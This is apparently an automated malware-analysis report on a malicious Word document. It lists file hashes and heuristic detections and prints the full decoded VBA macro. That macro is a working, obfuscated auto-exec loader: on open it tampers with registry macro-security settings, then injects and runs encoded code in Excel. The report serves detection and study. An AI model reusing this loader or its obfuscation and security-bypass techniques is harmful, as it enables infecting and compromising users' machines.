Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e5c56c5b9620fb54…

MALICIOUS

Office (OLE)

364.5 KB Created: 2018-11-25 20:11:00 Authoring application: Microsoft Office Word First seen: 2020-12-25
MD5: 44c900bd374ebce1aac1f1e45958f0fe SHA-1: 0608182a5ee641ac33aea6fbd14862013ccd88e6 SHA-256: e5c56c5b9620fb542eab82bdf75237d179bc996584b5c5f7a1c34ef5ae521c7d
270 Risk Score

Heuristics 9

  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
        Set cobw = GetObject(tkbl)
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set xl = CreateObject(cada("088139118" & agny & "2706508413113112712" & kpwj & "11613512" & eeoa & "129"))
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
        Set cobw = GetObject(tkbl)
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
        Set zyom = CallByName(tkbl, cada("084" & ucdo & "34124" & ucdo & "351" & rvzd & "9135"), zrec)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9284 bytes
SHA-256: a1c97c9ccf93a390ed90df24de27f710f9f5ffc4965fa4cb022017d8ef6a8f33
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True



Private Sub Document_Open()

lkod
hzla
auhr

End Sub

Function auhr()
    Set tkbl = Application
    Set zyom = CallByName(tkbl, cada("084" & ucdo & "34124" & ucdo & "351" & rvzd & "9135"), zrec)
    CallByName zyom, cada("087130084127" & agny & "33135"), VbMethod, cada("0871301" & gjsg & "6128" & agny & "291350" & owky & "8133133130133"), cada("1031231200511191301" & gjsg & "6128" & agny & "291350" & woor & "7" & agny & "33" & ucdo & "2" & eeoa & "" & irnx & "511" & fkrq & "40511291301350511" & gjsg & "01281311161351241171271200" & woor & "81" & fkrq & "512305" & kech & "1231" & fkrq & "40" & woor & "81301331190" & woor & "012112112" & kpwj & "1200" & woor & "7" & agny & "33" & ucdo & "2" & eeoa & "129"), 0, 1, 0, 0, 0
End Function
Function lkod()
    Dim tkbl, zyom As String
    Set tofj = Application
    eojx = CallByName(tofj, cada("105" & agny & "33" & ucdo & "2" & eeoa & "129"), zrec)
    tkbl = cada("10213012" & kech & "138116133" & agny & "110961241" & gjsg & "3130" & ucdo & "3012" & kech & "11109812112112" & kpwj & "" & agny & "11") & eojx & cada("111088139118" & agny & "27111102" & agny & "" & gjsg & "61331" & fkrq & "5140")
    zyom = cada("08" & kpwj & "118" & agny & "34" & ucdo & "05085098096")
    Set uzxe = cobw(cada("1381241" & rbdv & "8122128135134077142124128131" & agny & "33" & ucdo & "3012911613512" & eeoa & "" & irnx & "95" & agny & "37" & agny & "27080124128131" & agny & "33" & ucdo & "30129116135" & agny & "44052111111065111133130130135111119" & agny & "21116136127135077102135119101" & agny & "22099133130137"))
    CallByName uzxe, cada("102" & agny & "350871060981010871051" & rvzd & "7136120"), VbMethod, &H80000001, tkbl, zyom, 1

End Function

Function cobw(tkbl As String) As Object
    Set cobw = GetObject(tkbl)
End Function

Function cada(zyom As String) As String
    Dim tkbl As String
    tkbl = ""
    Do
        tkbl = tkbl + lzpb(ahfd(zyom))
        zyom = bppe(zyom)
    Loop While Len(zyom) > 0
    cada = tkbl
End Function

Function lzpb(zyom)
    lzpb = Chr(zyom - 19)
End Function
Function ahfd(zyom)
    ahfd = Left(zyom, 3)
End Function
Function bppe(zyom)
    bppe = Right(zyom, Len(zyom) - 3)
End Function

Function hzla()

    Do While True
    On Error GoTo Handler
    Dim xl, xw As Object
    Set xl = CreateObject(cada("088139118" & agny & "2706508413113112712" & kpwj & "11613512" & eeoa & "129"))

    CallByName xl, cada("105124" & ucdo & "24117127120"), ozgy, False
    CallByName xl, cada("087124" & ucdo & "31127116140084127" & agny & "33135134"), ozgy, False
    Set xv = CallByName(xl, cada("1061301" & umqm & "6117130130126134"), zrec)
    Set xw = CallByName(xv, cada("084119119"), zrec)
    Set xx = CallByName(xl, cada("0841" & gjsg & "51" & fkrq & "7" & agny & "061301" & umqm & "6117130130126"), zrec)
    nn = CallByName(xx, cada("0971" & rvzd & "8120"), zrec)
    Set xq = CallByName(xw, cada("105085099133130125" & agny & "" & gjsg & "5"), zrec)
    Set xr = CallByName(xq, cada("105085086130128131130129" & agny & "29135134"), zrec)
    Set xt = CallByName(xr(1), cada("086130119120096130119136127120"), zrec)
    CallByName xt, cada("0841191190891331301281021351" & umqm & "41" & rbdv & "2"), VbMethod, cada("0891361291" & gjsg & "512" & eeoa & "" & irnx & "511200590600" & pdwi & "" & kjry & "0510510" & owky & "7124" & xucn & "" & kbxb & "6124" & irnx & "9" & kech & "135131101" & agny & "320" & owky & "4134051098117125" & agny & "" & gjsg & "50" & pdwi & "" & kjry & "0510510" & kbxb & "2" & agny & "350" & kbxb & "6124" & irnx & "9" & kech & "135131101" & agny & "320" & owky & "00" & owky & "613" _
& "3" & agny & "16135120098117125" & agny & "" & gjsg & "50590530961241" & gjsg & "3130" & ucdo & "3012" & kech & "0651070960950911031030990530600" & pdwi & "" & kjry & "0510510" & kbxb & "6124" & irnx & "9" & kech & "135131101" & agny & "32065098131" & agny & "" & cyao & "10530900881030530630510531231351351310770" _
& "660661301231200651241200661181271240661241" & gjsg & "0" & irnx & "651311" & rbdv & "20530630" & owky & "91" & rvzd & "7" & ucdo & "200" & pdwi & "" & kjry & "0510510" & kbxb & "6124" & irnx & "9" & kech & "135131101" & agny & "32065134" & agny & "291190" & pdwi & "90" & pdwi & "" & kjry & "0510510511281401041010950" & owky & "00" & kbxb & "6" _
& "124" & irnx & "9" & kech & "135131101" & agny & "32065133" & agny & "" & oxdg & "1130129" & ucdo & "200851301191400" & pdwi & "" & kjry & "0510510510921210" & kbxb & "6124" & irnx & "9" & kech & "135131101" & agny & "320651021351161351361340" & owky & "00510690670670" & kbxb & "3123" & agny & "290" & pdwi & "" & kjry & "05105105105105" _
& "10510" & kbxb & "2" & agny & "350" & woor & "0102135133" & agny & "16" & xucn & "" & owky & "00" & owky & "6133" & agny & "16135120098117125" & agny & "" & gjsg & "5059053084087098087085065102135133" & agny & "16" & xucn & "530600" & pdwi & "" & kjry & "0510510510510510510" & woor & "0102135133" & agny & "16" & xucn & "65098131" & agny & "290" _
& "" & pdwi & "" & kjry & "0510510510510510510" & woor & "0102135133" & agny & "16" & xucn & "651031401311200" & owky & "00510680" & pdwi & "" & kjry & "0510510510510510510" & woor & "0102135133" & agny & "16" & xucn & "651061331" & fkrq & "51200" & kbxb & "6124" & irnx & "9" & kech & "135131101" & agny & "32065133" & agny & "" & oxdg & "1130129" _
& "" & ucdo & "200851301191400" & pdwi & "" & kjry & "0510510510510510510" & woor & "0102135133" & agny & "16" & xucn & "65102116137" & agny & "03130089124127120051053086077111136134" & agny & "33" & ucdo & "1113113611712712" & kpwj & "1111381241" & rbdv & "21191241" & rbdv & "206513513512105306305" _
& "10690" & pdwi & "" & kjry & "0510510510510510510" & woor & "0102135133" & agny & "16" & xucn & "65086127130" & ucdo & "200" & pdwi & "" & kjry & "0510510" & owky & "812911" & kjry & "0921210" & pdwi & "90" & pdwi & "90" & pdwi & "" & kjry & "0510510" & kbxb & "2123" & agny & "27127051053118128119065" & agny & "391200510661050770980970" _
& "66086053053134" & agny & "35051071089075080131130138" & agny & "33" & ucdo & "23" & agny & "27127051064" & agny & "39" & agny & "18051117140131116" & ucdo & "3405106" & kpwj & "051126124" & agny & "39059110102140134074" & agny & "28065103" & agny & "390740650881291" & gjsg & "01191241" & rbdv & "2112077" _
& "0770841020691300920920651411200741020741" & umqm & "41" & rbdv & "2059110102140134074" & agny & "28065069130130129137" & agny & "33074112077077089133130" & xucn & "85116" & ucdo & "200730711020741" & umqm & "41" & rbdv & "20590591221200740641" & gjsg & "0" & irnx & "74" & agny & "2907405" _
& "1058069130077111136134" & agny & "33" & ucdo & "1113113611712712" & kpwj & "1111381241" & rbdv & "21191241" & rbdv & "2065074074121058125125125125126057057134" & agny & "350" & kbxb & "2109080052071089075077069130080086052057057134" & agny & "35051" & agny & "280800521021" _
& "09077074080135052057057134" & agny & "350" & kbxb & "3088134080052" & agny & "28077125080060052057057134" & agny & "35051072097068109080052103088134077141080090052057057134" & agny & "350" & woor & "7101" & xucn & "80052072097068109077126080053053053053052" _
& "057057134" & agny & "350510710900800530530530530570571181" & rvzd & "7127051056137101" & xucn & "770530530530530800520710900771450640670630680520560530530530630510670" & pdwi & "90" & pdwi & "90881291190" & owky & "91361291" & gjsg & "512" & eeoa & "" & irnx & "" & pdwi & "9")
    CallByName xl, cada("101136129"), VbMethod, nn & cada("052103123124" & ucdo & "061301" & umqm & "6117130130126065120")
    GoTo nnt
    
Handler:

    Loop
    
nnt:
End Function

Function dmcx(tkbl)
    dmcx = CStr(tkbl)
End Function

Function zrec()
    zrec = VbGet
End Function

Function ozgy()
    ozgy = VbLet
End Function


Function gjsg()
    gjsg = dmcx(1813)
End Function


Function agny()
    agny = dmcx(1201)
End Function


Function kbxb()
    kbxb = dmcx(5110)
End Function


Function irnx()
    irnx = dmcx(1290)
End Function


Function ucdo()
    ucdo = dmcx(1341)
End Function


Function kech()
    kech = dmcx(1135)
End Function


Function eeoa()
    eeoa = dmcx(4130)
End Function


Function pdwi()
    pdwi = dmcx(3202)
End Function


Function fkrq()
    fkrq = dmcx(2413)
End Function


Function rbdv()
    rbdv = dmcx(2912)
End Function


Function cyao()
    cyao = dmcx(2905)
End Function


Function owky()
    owky = dmcx(5108)
End Function


Function lbhx()
    lbhx = dmcx(2012)
End Function


Function xucn()
    xucn = dmcx(1280)
End Function


Function kpwj()
    kpwj = dmcx(4118)
End Function


Function woor()
    woor = dmcx(5113)
End Function


Function kjry()
    kjry = dmcx(9051)
End Function


Function umqm()
    umqm = dmcx(3312)
End Function


Function rvzd()
    rvzd = dmcx(1612)
End Function


Function oxdg()
    oxdg = dmcx(3413)
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.